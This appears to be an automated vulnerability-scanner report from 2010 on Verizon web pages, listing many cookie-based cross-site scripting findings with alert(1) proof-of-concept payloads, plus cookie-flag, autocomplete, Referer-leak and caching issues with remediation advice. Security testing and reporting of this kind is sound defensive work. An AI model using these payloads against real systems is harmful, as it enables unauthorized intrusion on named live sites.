Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head"><meta http-equiv="X-UA-Compatible ...[SNIP]... <script type="text/javascript"> function startmenu() { } var mvzOptIn="N"; var strdotcomval = "226d7"-alert(1)-"1d917d73025" if(mvzOptIn != 'Y' || strdotcomval == "") { var m_view = new VZT.MasterNavView(); var m_model = {container: docu ...[SNIP]...
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload af320'><script>alert(1)</script>638530528ed was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 6357f<script>alert(1)</script>71117283bfe was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99a3b"-alert(1)-"75f87706d4 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head"><meta http-equiv="X-UA-Compatible ...[SNIP]... <script type="text/javascript"> function startmenu() { } var mvzOptIn="N"; var strdotcomval = "99a3b"-alert(1)-"75f87706d4" if(mvzOptIn != 'Y' || strdotcomval == "") { var m_view = new VZT.MasterNavView(); var m_model = {container: document.getElementB ...[SNIP]...
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f8583'><script>alert(1)</script>df9eda5005b was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 4c88c<script>alert(1)</script>04868af3b9a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 120ad<script>alert(1)</script>163fbe4701a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 79db9'><script>alert(1)</script>84341307296 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6862"-alert(1)-"9695dc43a78 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head"><meta http-equiv="X-UA-Compatible ...[SNIP]... OS Digital TV and High-Speed Internet Features',''); function startmenu() { } var mvzOptIn="N"; var strdotcomval = "c6862"-alert(1)-"9695dc43a78" if(mvzOptIn != 'Y' || strdotcomval == "") { var m_view = new VZT.MasterNavView(); var m_model = {container: document.getElementB ...[SNIP]...
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d0dac'><script>alert(1)</script>82a3c612b6a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 3db93<script>alert(1)</script>e45ae62280 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f41c"-alert(1)-"037c2ee7a79 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head"><meta http-equiv="X-UA-Compatible ...[SNIP]... <script type="text/javascript"> function startmenu() { } var mvzOptIn="N"; var strdotcomval = "1f41c"-alert(1)-"037c2ee7a79" if(mvzOptIn != 'Y' || strdotcomval == "") { var m_view = new VZT.MasterNavView(); var m_model = {container: document.getElementB ...[SNIP]...
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90afa'><script>alert(1)</script>32063bb4fe6 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload dc3af<script>alert(1)</script>751ce609535 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48553"-alert(1)-"872a1235bd2 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head"><meta http-equiv="X-UA-Compatible ...[SNIP]... <script type="text/javascript"> function startmenu() { } var mvzOptIn="N"; var strdotcomval = "48553"-alert(1)-"872a1235bd2" if(mvzOptIn != 'Y' || strdotcomval == "") { var m_view = new VZT.MasterNavView(); var m_model = {container: document.getElementB ...[SNIP]...
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 721a5<script>alert(1)</script>92d3aad9a2c was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5e917'><script>alert(1)</script>680f4f478a3 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9c96"-alert(1)-"386419827f6 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head"><meta http-equiv="X-UA-Compatible ...[SNIP]... <script type="text/javascript"> function startmenu() { } var mvzOptIn="N"; var strdotcomval = "d9c96"-alert(1)-"386419827f6" if(mvzOptIn != 'Y' || strdotcomval == "") { var m_view = new VZT.MasterNavView(); var m_model = {container: document.getElementB ...[SNIP]...
The value of the vzapps cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ae0f'-alert(1)-'8c7ffab235 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload 4d80b<script>alert(1)</script>dfd32d9c68b was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload f407d<script>alert(1)</script>0ced4116a66 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fiostv/web/Signin.aspx HTTP/1.1 Host: www36.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache RequestInfo: Served From :: BHDP1ISFTW05, Time Taken :: 406.2474 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 172510 Date: Sat, 20 Nov 2010 03:04:08 GMT Connection: close Set-Cookie: ASP.NET_SessionId=enqz1b45ldlygb45bcucegq3; path=/; HttpOnly Set-Cookie: DCReferringURL=/Signin.aspx; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fiostv/web/unprotected/showtime.aspx HTTP/1.1 Host: www36.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 RequestInfo: Served From :: BHDP1ISFTW06, Time Taken :: 78.123 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 24516 Date: Sat, 20 Nov 2010 03:04:01 GMT Connection: close Set-Cookie: ASP.NET_SessionId=wb5cyl55wlsb3445xgv2idj4; path=/; HttpOnly Set-Cookie: DCReferringURL=/ShowTime.aspx; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fiosvoice/ HTTP/1.1 Host: www36.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 20582 Expires: Sat, 20 Nov 2010 03:04:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 03:04:12 GMT Connection: close Set-Cookie: ASP.NET_SessionId=anbrwlbkau52u2vo5euf5y45; path=/; HttpOnly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head><title>SignIn</title><link rel="stylesheet" type="text/css" href="/FiOSVoice/Resources/V_102510_0938/css/Styles.css"></he ...[SNIP]...
5. Cookie without HttpOnly flag setpreviousnext There are 5 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /help/dsl_settings/ HTTP/1.1 Host: www2.verizon.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 139 Content-Type: text/html Cache-Control: private Date: Sat, 20 Nov 2010 03:06:55 GMT Connection: close Set-Cookie: ASPSESSIONIDSQRTBTDT=IHPHDNIDIIFPACJGGLIHPLLP; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /micro/speedtest/hsi/ HTTP/1.1 Host: www2.verizon.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: http://my.verizon.com/micro/speedtest/broadband/ Content-Length: 169 Content-Type: text/html Cache-Control: private Date: Sat, 20 Nov 2010 03:06:55 GMT Connection: close Set-Cookie: ASPSESSIONIDSQRTBTDT=JHPHDNIDCEBHDNBGBMPHKFGD; path=/
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://my.verizon.com/micro/speedtest/broadband/">here</a>.</body>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /HG?hc=&hb=DM570118F3VN%3BDM570203L6VD&cd=1&hv=6&n=home&con=&vcon=/microsites/ptt&tt=auto&ja=y&dt=19&zo=360&lm=1284069179000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&hid=0.9877317685168236 HTTP/1.1 Host: www35.vzw.com Proxy-Connection: keep-alive Referer: http://solutions.vzwshop.com/PTT/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 20 Nov 2010 03:03:49 GMT Server: Hitbox Gateway 9.3.6-rc1 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM" Set-Cookie: CTG=1290222229; path=/; domain=www35.vzw.com; expires=Sat, 27-Nov-2010 03:03:49 GMT; max-age=604800 Cneonction: close Pragma: no-cache Cache-Control: max-age=0, private, proxy-revalidate Expires: Sat, 20 Nov 2010 03:03:50 GMT Location: http://www35.vzw.com/HGct?hc=&hb=DM570118F3VN%3BDM570203L6VD&cd=1&hv=6&n=home&con=&vcon=/microsites/ptt&tt=auto&ja=y&dt=19&zo=360&lm=1284069179000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&hid=0.9877317685168236 Content-Type: image/gif Content-Length: 0
The following cookie was issued by the application and does not have the HttpOnly flag set:
DCReferringURL=/Signin.aspx; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fiostv/web/Signin.aspx HTTP/1.1 Host: www36.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache RequestInfo: Served From :: BHDP1ISFTW05, Time Taken :: 406.2474 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 172510 Date: Sat, 20 Nov 2010 03:04:08 GMT Connection: close Set-Cookie: ASP.NET_SessionId=enqz1b45ldlygb45bcucegq3; path=/; HttpOnly Set-Cookie: DCReferringURL=/Signin.aspx; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The following cookie was issued by the application and does not have the HttpOnly flag set:
DCReferringURL=/ShowTime.aspx; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fiostv/web/unprotected/showtime.aspx HTTP/1.1 Host: www36.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 RequestInfo: Served From :: BHDP1ISFTW06, Time Taken :: 78.123 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 24516 Date: Sat, 20 Nov 2010 03:04:01 GMT Connection: close Set-Cookie: ASP.NET_SessionId=wb5cyl55wlsb3445xgv2idj4; path=/; HttpOnly Set-Cookie: DCReferringURL=/ShowTime.aspx; path=/
<script type="text/javascript"> var TargetURL = ' ...[SNIP]...
6. Password field with autocomplete enabledpreviousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www36.verizon.com
Path:
/fiostv/web/Signin.aspx
Issue detail
The page contains a form with the following action URL:
https://www36.verizon.com/fiostv/web/Signin.aspx
The form contains the following password field with autocomplete enabled:
Password
Issue background
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
Request
GET /fiostv/web/Signin.aspx HTTP/1.1 Host: www36.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache RequestInfo: Served From :: BHDP1ISFTW05, Time Taken :: 406.2474 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 172510 Date: Sat, 20 Nov 2010 03:04:08 GMT Connection: close Set-Cookie: ASP.NET_SessionId=enqz1b45ldlygb45bcucegq3; path=/; HttpOnly Set-Cookie: DCReferringURL=/Signin.aspx; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
The response contains the following link to another domain:
https://twitter.com/SHOsports
Request
GET /fiostv/web/unprotected/showtime.aspx?CMP=DMC-SMP_D_ZZ_ZZ_E_DO_N_X001 HTTP/1.1 Host: www36.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 RequestInfo: Served From :: BHDP1ISFTW06, Time Taken :: 15.6246 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 24548 Date: Sat, 20 Nov 2010 03:04:03 GMT Connection: close Set-Cookie: ASP.NET_SessionId=jr5uzw45kvcuwa554k2q0s2i; path=/; HttpOnly Set-Cookie: DCReferringURL=/ShowTime.aspx; path=/
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="head"><meta http-equiv="X-UA-Compatible ...[SNIP]... </Script>
The following email address was disclosed in the response:
you@yahoo.com
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 103922 Expires: Sat, 20 Nov 2010 03:13:17 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 03:13:17 GMT Connection: close Set-Cookie: ContextInfo_State=TX; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: FAQs </title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon ...[SNIP]... <P class=copy>If you are already have a "you@yahoo.com" e-mail account, you can continue to access your mail separately if you wish. However, we highly recommend you give your existing you@yahoo.com account all the benefits of your new Yahoo!. This can be done at no additional charge by linking your "you@yahoo.com" account with your new Verizon Yahoo! account during the registration process. Just imagine all the added value you get from getting additional storage, premium spam functionality, premium virus prote ...[SNIP]...
10. Cacheable HTTPS responsepreviousnext There are 3 instances of this issue:
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:
GET /fiostv/web/unprotected/showtime.aspx HTTP/1.1 Host: www36.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
